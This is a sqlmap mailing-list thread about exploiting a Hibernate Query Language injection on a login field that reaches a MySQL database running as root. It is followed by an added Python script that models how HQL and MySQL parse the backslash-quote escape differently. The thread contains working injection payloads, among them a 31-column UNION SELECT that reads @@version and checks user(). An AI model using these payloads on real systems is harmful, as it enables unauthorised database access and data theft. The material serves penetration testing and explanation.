I *think* (going from memory here) that it's higher than that by default.
There's also the --union-cols=30-40 option, so you should be good.

On 24 February 2017 at 18:17, Robin Wood <robin@digi.ninja> wrote:

> I hadn't tried the custom injection point, I'll give that a try. Do you
> know the maximum number of fields the union will do, was thinking about it
> after shutting machine down and think it's 30 so will need to increase that.
>
> Robin
>
> On Fri, 24 Feb 2017, 23:14 Chris Oakley, <christopher.oak...@gmail.com>
> wrote:
>
>> I assume you've tried * for custom injection point and --technique=U?
>>
>> Whether or not it'll dance with HQL is another question entirely.
>>
>> On 24 February 2017 at 16:44, Robin Wood <robin@digi.ninja> wrote:
>>
>> I've just found an instance of Hibernate Query Language injection that
>> lets me get at an underlying MySQL database if I inject in the right way,
>> some examples I've got are:
>>
>> loginName=a - works and gives 200
>> loginName=' - fails with HQL error and 500
>> loginName=a' or 'a'='a - works and gives 200
>> loginName=a\'' - gets through HQL and then generates a MySQL error in a
>> where clause. The injection gets converted to where NAME='a\'''
>>
>> With some playing I've found that this is a valid injection and they are
>> running as root, as I get a 500 back when I supply root and a 200 when I give
>> something else.
>>
>> loginName=a' and 'a\''="a" union select @@version,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2,3,4,5,"2001-01-01",2,3,"2001-01-01","2001-01-01" from users where user()="root@localhost" -- '='1
>>
>> The 500 is because some of the stuff from the union isn't being handled
>> correctly by the page, the 200 is because the union doesn't return any data
>> so the first bit (basically a=a) is returning valid data so getting through
>> the rest of the parsing.
>>
>> So I think what I need to do is to tell SQLMap that it is a union
>> injection with 31 fields and that the injection needs to go into here:
>>
>> loginName=a' and 'a\''="a" <INJECT> -- '='1
>>
>> Can I do this?
>>
>> I've got all this set up and running in Burp so I can test things out if
>> anyone needs me to.
>>
>> Robin
>>
>> ------------------------------------------------------------------------------
>> Check out the vibrant tech community on one of the world's most
>> engaging tech sites, SlashDot.org! http://sdm.link/slashdot
>> _______________________________________________
>> sqlmap-users mailing list
>> sqlmap-users@lists.sourceforge.net
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>>
>>
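The reason the a\'' trick in the thread works is a parser differential: HQL only knows '' as an escape inside a string literal and Hibernate copies the literal text into the SQL unchanged, while MySQL also treats backslash as an escape, so the same bytes are one literal to Hibernate and a broken or re-opened literal to MySQL. The following script is an added example (mine, not code from the thread or from sqlmap) that models just that: a string-literal tokeniser run once with HQL rules and once with MySQL rules over the values Robin posted. It assumes the application concatenates the value into where NAME='<input>' and that Hibernate passes literals through verbatim (the thread's own observation); only single-quoted literals and "-- " line comments are modelled, double-quoted values are treated as ordinary code.

```python
import re

# Added example, not code from the thread or from sqlmap. Models string-literal
# tokenising for the two parsers the input passes through: HQL, where '' is the
# only escape inside a literal, and MySQL, where backslash escapes as well.
# Assumption (from the thread: a\'' reaches MySQL as NAME='a\'''): Hibernate
# copies the literal text into the generated SQL unchanged.


class UnterminatedString(Exception):
    """A quoted literal that never closes: the parser errors, the app returns 500."""


def build_query(login_name):
    """Vulnerable concatenation assumed from the thread: where NAME='<input>'."""
    return "where NAME='" + login_name + "'"


def tokenize(text, backslash_escapes):
    """Split text into ('code'|'str'|'comment', body) tokens.

    Only single-quoted literals are modelled. '' is an escaped quote in both
    dialects; \\' is an escaped quote only when backslash_escapes is True (MySQL).
    A '-- ' in code context is a line comment that swallows the rest of the text.
    """
    tokens, code, i, n = [], [], 0, len(text)
    while i < n:
        if text.startswith("-- ", i):
            if code:
                tokens.append(("code", "".join(code)))
            tokens.append(("comment", text[i:]))
            return tokens
        if text[i] != "'":
            code.append(text[i])
            i += 1
            continue
        if code:
            tokens.append(("code", "".join(code)))
            code = []
        i += 1                                   # consume the opening quote
        val = []
        while True:
            if i >= n:
                raise UnterminatedString("".join(val))
            if backslash_escapes and text[i] == "\\" and i + 1 < n:
                val.append(text[i + 1])          # MySQL: \x is a literal x
                i += 2
            elif text.startswith("''", i):
                val.append("'")                  # both dialects: '' is a literal quote
                i += 2
            elif text[i] == "'":
                i += 1                           # closing quote
                break
            else:
                val.append(text[i])
                i += 1
        tokens.append(("str", "".join(val)))
    if code:
        tokens.append(("code", "".join(code)))
    return tokens


def classify(login_name):
    """Does the value survive HQL, survive MySQL, and land a UNION in MySQL's code?"""
    query = build_query(login_name)
    result = {"hql": "ok", "mysql": "ok", "union_reaches_mysql": False}
    try:
        tokenize(query, backslash_escapes=False)           # Hibernate's HQL parser
    except UnterminatedString:
        result["hql"] = "error"                            # HQL error, 500, MySQL never sees it
        return result
    try:
        sql_tokens = tokenize(query, backslash_escapes=True)   # MySQL's lexer
    except UnterminatedString:
        result["mysql"] = "error"                          # MySQL syntax error in the WHERE
        return result
    result["union_reaches_mysql"] = any(
        kind == "code" and "union" in body.lower() for kind, body in sql_tokens)
    return result


def union_column_count(sql_tokens):
    """Number of expressions in the UNION SELECT list, as MySQL would see them."""
    code = " ".join(body for kind, body in sql_tokens if kind == "code")
    m = re.search(r"union\s+select\s+(.*?)\s+from\b", code, re.I | re.S)
    return len(m.group(1).split(",")) if m else 0


# The thread's 31-column payload, copied from Robin's message.
UNION_PAYLOAD = (
    "a' and 'a\\''=\"a\" union select @@version,2,3,4,5,6,7,8,9,10,"
    "11,12,13,14,15,16,17,18,19,20,21,22,2,3,4,5,\"2001-01-01\",2,3,"
    "\"2001-01-01\",\"2001-01-01\" from users where user()=\"root@localhost\" -- '='1"
)

# Test values from the thread.
SAMPLES = {
    "plain": "a",
    "lone quote": "'",
    "tautology": "a' or 'a'='a",
    "hql pass-through": "a\\''",
    "union": UNION_PAYLOAD,
}

if __name__ == "__main__":
    for name, value in SAMPLES.items():
        print(f"{name:18} -> {classify(value)}")
    sql = tokenize(build_query(UNION_PAYLOAD), backslash_escapes=True)
    print("union columns as seen by MySQL:", union_column_count(sql))
```

Reading the output against the thread: the lone quote dies in HQL (the 500 with an HQL error), a\'' is a single literal to HQL but leaves MySQL with an unterminated string (the MySQL error in the where clause), and the full payload is a plain string comparison to HQL while MySQL sees a 31-column UNION followed by a comment. The "-- " that closes it off is what makes the trailing '='1' harmless on the MySQL side.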